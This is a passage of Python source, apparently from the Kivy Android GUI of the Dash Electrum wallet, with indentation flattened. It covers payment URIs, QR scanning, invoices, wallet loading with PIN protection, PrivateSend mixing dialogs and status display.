cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def switch_to_send_screen(func):
# try until send_screen is available
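# Clock.schedule_interval keeps calling f every 0.1s until it returns False:
# no wallet yet -> keep waiting; wallet but no send_screen -> switch to the
# 'send' tab and keep waiting; send_screen ready -> run func once and stop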
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme in [DASH_BIP21_URI_SCHEME, PAY_BIP21_URI_SCHEME]:
self.set_URI(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Current screen orientation of the app.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
self.is_android = ('ANDROID_DATA' in os.environ)
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
self.tor_auto_on_bp = self.electrum_config.get('tor_auto_on', True)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._trigger_update_readiness = Clock.create_trigger(self.update_readiness, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._plugins_dialog = None
self._settings_dialog = None
self._dash_net_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data: str):
from electrum_dash.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
data_l = data.lower()
if (data_l.startswith(DASH_BIP21_URI_SCHEME + ':')
or data_l.startswith(PAY_BIP21_URI_SCHEME + ':')):
self.set_URI(data)
return
# try to decode transaction
from electrum_dash.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def run_other_app(self, app_name):
if not self.is_android:
return f'Cannot start {app_name}: not an Android system'
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
pm = autoclass('android.content.pm.PackageManager')
activity = PythonActivity.mActivity
pm_ = activity.getPackageManager()
array_pkg = pm_.getInstalledApplications(pm.GET_META_DATA).toArray()
selected_pkg = []
for i in array_pkg:
if "/data/app/" not in getattr(i, "publicSourceDir"):
continue
selected_pkg.append(i)
app_to_launch = app_name
found = False
for i in selected_pkg:
if app_to_launch == getattr(i, "packageName"):
found = True
try:
package_name = getattr(i, "packageName")
app_intent = pm_.getLaunchIntentForPackage(package_name)
app_intent.setAction(Intent.ACTION_VIEW)
app_intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
activity.startActivity(app_intent)
def _run_task(activity, app_intent):
time.sleep(0.25)
activity.startActivity(app_intent)
args = (activity, app_intent)
threading.Thread(target=_run_task, args=args).start()
except Exception as e:
return f'Error launching {app_name}: {str(e)}'
if not found:
return f'App {app_name} not found'
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.dash.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum_dash import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
if data is not None:
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for dash: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified',
'verified-islock', 'excessive-resource-usage']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_mn_list_updated,
['mn-list-diff-updated',
'mn-list-info-updated'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.show_backup_msg()
def show_backup_msg(self):
w = self.wallet
if w and getattr(w.storage, 'backup_message', None):
WarnDialog(w.storage.backup_message, title=_('Information')).open()
w.storage.backup_message = ''
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
def continue_load():
self._load_wallet_by_name(path)
if (self.electrum_config.get('tor_auto_on', True)
and not self.network.detect_tor_proxy()):
TorWarnDialog(self, path, continue_load).open()
else:
continue_load()
def _load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
if db.upgrade_done:
storage.backup_old_version()
if db.check_unfinished_multisig():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.continue_multisig_setup(storage)
else:
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.history_screen.stop_get_data_thread()
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
util.unregister_callback(self.on_ps_callback)
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
if key == 27 and self.is_exit:
if self.wallet:
psman = self.wallet.psman
is_mixing = (psman.state in psman.mixing_running_states)
is_waiting = psman.is_waiting if is_mixing else False
if is_mixing and not is_waiting:
def on_want_exit(b):
if b:
from kivy.base import stopTouchApp
stopTouchApp()
d = Question(psman.WAIT_MIXING_STOP_MSG, on_want_exit)
d.open()
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
else:
self._settings_dialog.update()
self._settings_dialog.open()
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def plugins_dialog(self):
from .uix.dialogs.plugins import PluginsDialog
if self._plugins_dialog is None:
self._plugins_dialog = PluginsDialog(self)
self._plugins_dialog.update()
self._plugins_dialog.open()
def dash_net_dialog(self):
from .uix.dialogs.dash_net import DashNetDialog
if self._dash_net_dialog is None:
self._dash_net_dialog = DashNetDialog(self)
self._dash_net_dialog.update()
self._dash_net_dialog.open()
def privatesend_dialog(self):
if self.wallet.psman.unsupported:
from .uix.dialogs.privatesend import PSDialogUnsupportedPS as psdlg
else:
from .uix.dialogs.privatesend import PSDialog as psdlg
psdlg(self).open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'plugins':
self.plugins_dialog()
elif name == 'dash_net':
self.dash_net_dialog()
elif name == 'privatesend':
self.privatesend_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_dash.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_dash.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_dash_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_dash_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
if self.testnet:
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-dash-testnet.png"
else:
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-dash.png"
self.root.ids.ps_button.icon = self.ps_icon()
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
self._trigger_update_readiness()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
self._trigger_update_readiness()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
wallet, tx = args
if wallet.psman.need_notify(tx.txid()):
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
elif event == 'verified-islock':
self._trigger_update_wallet()
elif event == 'excessive-resource-usage':
self.show_info(args[0])
def on_ps_callback(self, event, *args):
Clock.schedule_once(lambda dt: self.on_ps_event(event, *args))
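# on_ps_event() runs on the UI thread (scheduled above by on_ps_callback).
# It refreshes the wallet view on PrivateSend data/reserved changes, updates
# the PrivateSend button and shows messages on state changes, and opens
# confirmation dialogs for the "not enough small denoms" and "other coins
# arrived" events.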
def on_ps_event(self, event, *args):
psman = self.wallet.psman
is_mixing = (psman.state in psman.mixing_running_states)
is_waiting = psman.is_waiting if is_mixing else False
if event == 'ps-data-changes':
wallet = args[0]
if wallet == self.wallet:
self._trigger_update_wallet()
if event == 'ps-reserved-changes':
wallet = args[0]
if wallet == self.wallet:
self._trigger_update_wallet()
elif event in ['ps-state-changes', 'ps-wfl-changes',
'ps-keypairs-changes']:
wallet, msg, msg_type = (*args, None, None)[:3]
if wallet == self.wallet:
self.update_ps_btn(is_mixing, is_waiting)
if msg:
if msg_type and msg_type.startswith('inf'):
self.show_info(msg)
else:
WarnDialog(msg, title=_('PrivateSend')).open()
elif event == 'ps-not-enough-sm-denoms':
wallet, denoms_by_vals = args
if wallet == self.wallet:
q = psman.create_sm_denoms_data(confirm_txt=True)
def create_small_denoms(confirmed):
if confirmed:
self.create_small_denoms(denoms_by_vals)
d = Question(q, create_small_denoms)
d.open()
elif event == 'ps-other-coins-arrived':
wallet, txid = args
if wallet == self.wallet:
q = '\n\n'.join([psman.OTHER_COINS_ARRIVED_MSG1.format(txid),
psman.OTHER_COINS_ARRIVED_MSG2,
psman.OTHER_COINS_ARRIVED_MSG3,
psman.OTHER_COINS_ARRIVED_MSG4,
psman.OTHER_COINS_ARRIVED_Q])
def show_coins_dialog(confirmed):
if confirmed:
self.coins_dialog(1)
d = Question(q, show_coins_dialog)
d.open()
def create_small_denoms(self, denoms_by_vals):
w = self.wallet
psman = w.psman
coins = psman.get_biggest_denoms_by_min_round()
if not coins:
msg = psman.create_sm_denoms_data(no_denoms_txt=True)
self.show_error(msg)
return
self.create_new_denoms(coins[0:1])
def create_new_denoms(self, coins):
def on_q_answered(confirmed):
if confirmed:
self.protected(_('Enter your PIN code to sign'
' new denoms transactions'),
self._create_new_denoms, (coins,))
w = self.wallet
psman = w.psman
info = psman.new_denoms_from_coins_info(coins)
q = _('Do you want to create transactions?\n\n{}').format(info)
d = Question(q, on_q_answered)
d.open()
def _create_new_denoms(self, coins, password):
w = self.wallet
psman = w.psman
wfl, err = psman.create_new_denoms_wfl_from_gui(coins, password)
if err:
self.show_error(err)
else:
self.show_info(f'Created New Denoms workflow with'
f' txids: {", ".join(wfl.tx_order)}')
def create_new_collateral(self, coins):
def on_q_answered(confirmed):
if confirmed:
self.protected(_('Enter your PIN code to sign'
' new collateral transactions'),
self._create_new_collateral, (coins,))
w = self.wallet
psman = w.psman
info = psman.new_collateral_from_coins_info(coins)
q = _('Do you want to create transactions?\n\n{}').format(info)
d = Question(q, on_q_answered)
d.open()
def _create_new_collateral(self, coins, password):
w = self.wallet
psman = w.psman
wfl, err = psman.create_new_collateral_wfl_from_gui(coins, password)
if err:
self.show_error(err)
else:
self.show_info(f'Created New Collateral workflow with'
f' txids: {", ".join(wfl.tx_order)}')
def update_ps_btn(self, is_mixing, is_waiting):
ps_button = self.root.ids.ps_button
ps_button.icon = self.ps_icon(active=is_mixing, is_waiting=is_waiting)
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
util.register_callback(self.on_ps_callback,
['ps-data-changes',
'ps-reserved-changes',
'ps-not-enough-sm-denoms',
'ps-other-coins-arrived',
'ps-wfl-changes',
'ps-keypairs-changes',
'ps-state-changes'])
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
balance_sat = c + u + x
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
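# get_max_amount() estimates the maximum spendable amount by building an
# unsigned transaction that sends everything ('!') to the send screen's
# address (or a dummy address), then subtracting any plugin-provided extra
# fee from the resulting output value.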
def get_max_amount(self, is_ps=False):
from electrum_dash.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
min_rounds = None if not is_ps else self.wallet.psman.mix_rounds
include_ps = (min_rounds is None)
inputs = self.wallet.get_spendable_coins(None,
include_ps=include_ps,
min_rounds=min_rounds)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs,
min_rounds=min_rounds)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in duffs/kB
return format_fee_satoshis(fee_rate) + ' duffs/kB'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Dash Electrum', message,
app_icon=icon, app_name='Dash Electrum')
except ImportError:
self.logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
@property
def testnet(self):
return self.electrum_config.get('testnet')
@property
def app_icon(self):
return ATLAS_ICON % ('logo-testnet' if self.testnet else 'logo')
def ps_icon(self, active=False, is_waiting=False):
if not active:
icon = 'privatesend'
elif not is_waiting:
icon = 'privatesend_active'
else:
icon = 'privatesend_waiting'
return ATLAS_ICON % icon
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
else:
